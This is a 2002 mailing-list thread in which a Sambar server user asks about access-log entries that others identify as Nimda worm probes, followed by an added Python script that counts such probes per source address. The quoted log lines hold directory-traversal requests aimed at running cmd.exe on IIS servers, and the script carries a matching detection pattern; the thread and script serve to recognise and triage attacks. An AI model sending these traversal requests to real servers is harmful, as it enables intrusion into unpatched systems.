Thanks, Hank, Tony and Alex. I was aware that it was no harm to Sambar and since I 
don't run IIS, no worries here. However, I have tracked down one of the offending 
servers and wanted to contact them with informed information. That's why I needed the 
name of the virus on their server.

Dave Culbertson

On 11/May/2002 10:51:22, Tony Mallen wrote:
> Nimda virus from unpatched Microsoft servers. But it's getting a 404 error so should be okay.
> 
> On 11/May/2002 04:59:49, Dave Culbertson wrote:
> > Does anyone recognize what kind of virus or bot would cause the following access log entries?
> > 
> > 64.65.199.33 - - [04/May/2002:00:45:06 -0400] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 565 0 "-" "-"
> > 64.65.199.33 - - [04/May/2002:00:45:07 -0400] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 565 0 "-" "-"
> > 64.65.199.33 - - [04/May/2002:00:45:08 -0400] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 565 0 "-" "-"
> > 64.65.199.33 - - [04/May/2002:00:45:09 -0400] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 565 0 "-" "-"
> > 64.65.199.33 - - [04/May/2002:00:45:10 -0400] "GET /scripts/..%5c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 565 0 "-" "-"
> > 64.65.199.33 - - [04/May/2002:00:45:11 -0400] "GET /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 565 0 "-" "-"
> > 64.65.199.33 - - [04/May/2002:00:45:12 -0400] "GET /_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 565 0 "-" "-"
> > 64.65.199.33 - - [04/May/2002:00:45:13 -0400] "GET /msadc/..%5c../..%5c../..%5c/..�../..�../..�../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 565 0 "-" "-"
> > 64.65.199.33 - - [04/May/2002:00:45:13 -0400] "GET /scripts/..�../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 565 0 "-" "-"
> > 64.65.199.33 - - [04/May/2002:00:45:14 -0400] "GET /scripts/..�/../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 565 0 "-" "-"
> > 64.65.199.33 - - [04/May/2002:00:45:15 -0400] "GET /scripts/..��../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 565 0 "-" "-"
> > 64.65.199.33 - - [04/May/2002:00:45:16 -0400] "GET /scripts/..��../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 565 0 "-" "-"
> > 64.65.199.33 - - [04/May/2002:00:45:17 -0400] "GET /scripts/..S5c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 565 0 "-" "-"
> > 64.65.199.33 - - [04/May/2002:00:45:21 -0400] "GET /scripts/..S5c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 565 0 "-" "-"
> > 64.65.199.33 - - [04/May/2002:00:45:23 -0400] "GET /scripts/..%5c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 565 0 "-" "-"
> > 64.65.199.33 - - [04/May/2002:00:45:25 -0400] "GET /scripts/..%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 565 0 "-" "-"
> > 
> > I am being accessed by quite a few computers with the same or similar entries and would like to know the name of what this is. Thanks.
> > 
> > Dave Culbertson
> > 

-------------------------------------------------------
To unsubscribe please go to http://www.sambar.ch/list/
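
An added example, not part of the thread: one way to triage access-log entries like those quoted above, counting per source address how many requests target `cmd.exe` or `root.exe` and whether any received a non-error status instead of the 404 seen here. It assumes the log layout shown in the post; the two `192.0.2.x` lines are constructed sample input and the function names are hypothetical.

```python
import re
from collections import defaultdict
from urllib.parse import unquote

# Log layout as quoted in the post: ip - - [time] "METHOD target PROTO" status ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "\S+ (?P<target>\S+) [^"]*" (?P<status>\d{3}) ')
PROBE_RE = re.compile(r'/(?:cmd|root)\.exe$', re.IGNORECASE)

def classify(line):
    """Return (ip, status, used_traversal) for a probe line, else None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    path = m['target'].split('?', 1)[0]
    # Decode twice so double-encoded separators (%255c) are seen as well,
    # then treat backslashes as path separators.
    decoded = unquote(unquote(path)).replace('\\', '/')
    if not PROBE_RE.search(decoded):
        return None
    return m['ip'], int(m['status']), '..' in decoded

def summarize(lines):
    """Per source IP: probe count, traversal count, probes answered with <400."""
    stats = defaultdict(lambda: {'probes': 0, 'traversal': 0, 'answered': 0})
    for line in lines:
        hit = classify(line)
        if hit is None:
            continue
        ip, status, traversal = hit
        stats[ip]['probes'] += 1
        stats[ip]['traversal'] += int(traversal)
        stats[ip]['answered'] += int(status < 400)  # anything but an error needs review
    return dict(stats)

SAMPLE = [
    # First three lines are taken from the post above.
    '64.65.199.33 - - [04/May/2002:00:45:06 -0400] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 565 0 "-" "-"',
    '64.65.199.33 - - [04/May/2002:00:45:10 -0400] "GET /scripts/..%5c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 565 0 "-" "-"',
    '64.65.199.33 - - [04/May/2002:00:45:25 -0400] "GET /scripts/..%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 565 0 "-" "-"',
    # Constructed lines: a normal request and a probe that was not rejected.
    '192.0.2.10 - - [04/May/2002:00:46:00 -0400] "GET /index.html HTTP/1.0" 200 1024 0 "-" "-"',
    '192.0.2.77 - - [04/May/2002:00:47:00 -0400] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 200 512 0 "-" "-"',
]

if __name__ == '__main__':
    for ip, s in summarize(SAMPLE).items():
        print(ip, s)
```

A source whose `answered` count is zero matches the situation described in the reply above, where every request got a 404.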



